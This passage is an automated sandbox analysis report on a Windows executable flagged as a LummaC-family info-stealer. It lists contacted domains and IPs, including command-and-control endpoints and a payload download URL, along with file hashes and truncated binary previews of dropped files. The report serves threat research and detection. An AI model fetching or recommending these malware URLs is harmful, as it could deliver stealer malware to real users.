                                                            http://crl.micro5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.c.lencr.org/05734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/05734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cloudewahsj.shop/Y5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://176.113.115.19/ScreenUpdateSync.exeUIH5XqCdf06.exe, 00000000.00000002.4569947875.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cloudewahsj.shop/5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://post-to-me.com/IH5XqCdf06.exe, 00000000.00000002.4569947875.0000000000713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cloudewahsj.shop/G5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://cloudewahsj.shop/apiY5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://support.mozilla.org/products/firefoxgro.all5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.mozilla.or5734.tmp.exe, 00000003.00000003.2224712437.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cloudewahsj.shop/apic5734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.96.1
                                                                              cloudewahsj.shopUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.21.56.70
                                                                              post-to-me.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              176.113.115.19
                                                                              unknownRussian Federation
                                                                              49505SELECTELRUfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1584355
                                                                              Start date and time:2025-01-05 08:54:08 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 33s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:IH5XqCdf06.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:3bd2d12ed926118beb65b4cf48b49d5b.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/7@2/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 95%
                                                                              • Number of executed functions: 47
                                                                              • Number of non-executed functions: 316
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.45, 40.126.32.133, 20.109.210.53
                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              02:55:02API Interceptor9075142x Sleep call for process: IH5XqCdf06.exe modified
                                                                              02:55:06API Interceptor5x Sleep call for process: 5734.tmp.exe modified
                                                                              02:55:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                              • pelisplus.so/administrator/index.php
                                                                              Recibos.exeGet hashmaliciousFormBookBrowse
                                                                              • www.mffnow.info/1a34/
                                                                              104.21.56.70J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                      AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                        rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                          XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                            QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                              LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                  176.113.115.19J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  cloudewahsj.shop3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.64.1
                                                                                                  m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.80.1
                                                                                                  ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.112.1
                                                                                                  rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  post-to-me.comJ18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.179.207
                                                                                                  AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUS3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.43.44
                                                                                                  3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.219.93
                                                                                                  elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 172.64.41.3
                                                                                                  elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                  • 172.64.41.3
                                                                                                  X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 162.159.137.232
                                                                                                  KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 162.159.137.232
                                                                                                  https://bit.ly/3VYGxmhGet hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                                                  • 104.18.95.41
                                                                                                  CLOUDFLARENETUS3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.43.44
                                                                                                  3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.48.1
                                                                                                  3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.219.93
                                                                                                  elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 172.64.41.3
                                                                                                  elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                  • 172.64.41.3
                                                                                                  X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 162.159.137.232
                                                                                                  KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 162.159.137.232
                                                                                                  https://bit.ly/3VYGxmhGet hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                                                  • 104.18.95.41
                                                                                                  SELECTELRUJ18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  176.113.115_1.170.ps1Get hashmaliciousXWormBrowse
                                                                                                  • 176.113.115.170
                                                                                                  botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 178.132.202.249
                                                                                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 176.113.115.19
                                                                                                  https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 82.202.242.100
                                                                                                  2.png.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 176.113.115.178
                                                                                                  1.png.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 176.113.115.178
                                                                                                  GO.png.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 176.113.115.178
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 176.113.115.178
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e13jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                  • 104.21.96.1
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.96.1
                                                                                                  37f463bf4616ecd445d4a1937da06e19Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                  • 104.21.56.70
                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                  • 104.21.56.70
                                                                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                  • 104.21.56.70
                                                                                                  J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.56.70
                                                                                                  HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                                                  • 104.21.56.70
                                                                                                  http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                  • 104.21.56.70
                                                                                                  nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                  • 104.21.56.70
                                                                                                  adguardInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.56.70
                                                                                                  adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                  • 104.21.56.70
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.0603329343625416
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:xizaA1om0hFvijvEmFizuiFcQZ24IO8R:+jKNhFvijbizuiFcQY4IO8R
                                                                                                  MD5:9DBDB9D0C11B62854DCF19AA441C98ED
                                                                                                  SHA1:3890E76BDC53411CFB6D07E8E0A4F01DBDB462F7
                                                                                                  SHA-256:797FD524E11E98B10102851E81361561C04B98C69E85631475E68AADE75DFC45
                                                                                                  SHA-512:6E898CE5A4CC5DF7E71D9537A950A9094BA8F3821249682A27C5EF5EC896AF208FDE4ED6576BAA74E1AF699F24F378B2896A6106836339C055CC1981758DAB16
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.3.7.3.1.3.0.5.0.2.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.3.7.3.1.4.4.4.0.8.7.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.e.7.7.f.9.5.-.5.9.2.e.-.4.a.7.e.-.8.b.d.3.-.8.e.e.6.8.a.8.5.2.9.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.9.b.2.9.3.7.-.a.3.d.e.-.4.a.9.b.-.8.9.4.c.-.f.8.2.c.c.a.0.f.9.f.0.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.7.3.4...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.d.8.-.0.0.0.1.-.0.0.1.5.-.5.8.2.6.-.f.6.2.0.4.7.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.e.5.9.e.e.7.d.9.0.b.3.c.4.3.c.8.d.8.5.a.5.6.6.e.e.9.0.1.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.2.d.8.9.6.9.1.d.4.9.1.a.2.e.c.3.f.1.5.9.1.1.4.0.6.a.2.2.1.a.d.1.3.5.e.9.6.4.e.8.!.5.7.3.4...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 15 streams, Sun Jan 5 07:55:13 2025, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):110830
                                                                                                  Entropy (8bit):2.193822294194324
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:csP7dVTBldHBlUH2Uuv5sceCtfBEBSSjCTs7wJSCbHdANaGC09lhu9q/b3GbBB:cInTBjPUH8v6ESuiwxbb76VG1B
                                                                                                  MD5:418FA67A002F00D71A9FF45BEC6E63FE
                                                                                                  SHA1:2FD9D8994DC1A9C8FF7EE60C999F6343BAB4A066
                                                                                                  SHA-256:76386E248E44FD3CE76C903FBE837316959AC3DC4A530E098DDE3193E33DD1C2
                                                                                                  SHA-512:3C509D7BE185C1044FFE7638D5F117BA293AB2FB2DB29E4633809C1BED6ACFC9E84AB14CC00D7A740795C09E9495441AC20CCEF2A6DCC173A0B7367D83061A58
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:MDMP..a..... ........:zg........................p...............h$......D....N..........`.......8...........T...........pE..~k...........$...........&..............................................................................eJ......p'......GenuineIntel............T............:zg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8334
                                                                                                  Entropy (8bit):3.7006257626509655
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJd5gh6IX6Yan6yfgmfSrpD/89bJpsfVsDm:R6lXJLgh6IX6YS66gmfSeJCfn
                                                                                                  MD5:DA2403304BA392416EC9A295F064C51A
                                                                                                  SHA1:998D937BA4758D5B160A2E42E112EC7037357DE0
                                                                                                  SHA-256:18389FAAE2971B6022402DCD6E151CC1B3E3EA135752DC776104BAC81906A36C
                                                                                                  SHA-512:88A39FFF4C0817B917E159B17070BBD170751124B905A30E8A2553FA62A048300ACB58C6E79BAFFF7F6AB5A20E9579E57492A3E7AC5CE3F729E9F15B6B5DA673
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.4.4.<./.P.i.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4613
                                                                                                  Entropy (8bit):4.479845079739797
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zs/Jg77aI9T4WpW8VY4Ym8M4J76OqFF5+q8E2O9QhlVYDwMdd:uIjfhI7Rx7VUJOZ54CQZYLdd
                                                                                                  MD5:BE5AEC6A7DF202B2A044547DB58FC8C3
                                                                                                  SHA1:F641B2EB20FFBBBBE0B54816DFAA71EB4EE5B564
                                                                                                  SHA-256:8F2D7E397BDDD5DA919F9E443C86921F217FDB3D4EE88CFD6334659DA5CCE260
                                                                                                  SHA-512:47F7EB414754D5CB1330B72C9788DE7639822E44BBF68746DFD93F7F245D40A717DE9C5D878E68AFB9F435AB23A2521C166C351731C1FE79E910439C26E7F54F
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662337" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                  Process:C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330240
                                                                                                  Entropy (8bit):7.351781479744392
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:vjv17LBCG5mOq+WEosDCrE/NKbO3gcbf2MPD6zqAZkVGDoJHk:vjd7dCEmOqTEos6MgAgcbJPQqASVGD
                                                                                                  MD5:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  SHA1:2D89691D491A2EC3F15911406A221AD135E964E8
                                                                                                  SHA-256:21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
                                                                                                  SHA-512:41059816703D71427E0E9ED6A260448F25808E00C159DE58EAA8F0D6A6538406BBFBF76C8D8FCC0653959175009C3B20187DDD02DD4F0CA5CD51CEDDE528485D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                  Reputation:low
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L....0df.....................R......_D.......0....@.................................,^......................................<"..P.......`...........................................................x-..@............................................text...l........................... ..`.data........0...`... ..............@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330240
                                                                                                  Entropy (8bit):7.351781479744392
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:vjv17LBCG5mOq+WEosDCrE/NKbO3gcbf2MPD6zqAZkVGDoJHk:vjd7dCEmOqTEos6MgAgcbJPQqASVGD
                                                                                                  MD5:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  SHA1:2D89691D491A2EC3F15911406A221AD135E964E8
                                                                                                  SHA-256:21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
                                                                                                  SHA-512:41059816703D71427E0E9ED6A260448F25808E00C159DE58EAA8F0D6A6538406BBFBF76C8D8FCC0653959175009C3B20187DDD02DD4F0CA5CD51CEDDE528485D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                  Reputation:low
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L....0df.....................R......_D.......0....@.................................,^......................................<"..P.......`...........................................................x-..@............................................text...l........................... ..`.data........0...`... ..............@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1835008
                                                                                                  Entropy (8bit):4.468587446333428
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:PzZfpi6ceLPx9skLmb0ffZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:bZHtfZWOKnMM6bFpNj4
                                                                                                  MD5:7E201454DC39F5D4E4970462DEC1B1F3
                                                                                                  SHA1:AEBE0233BD713CA92D9C010501CDB6B29BCC732E
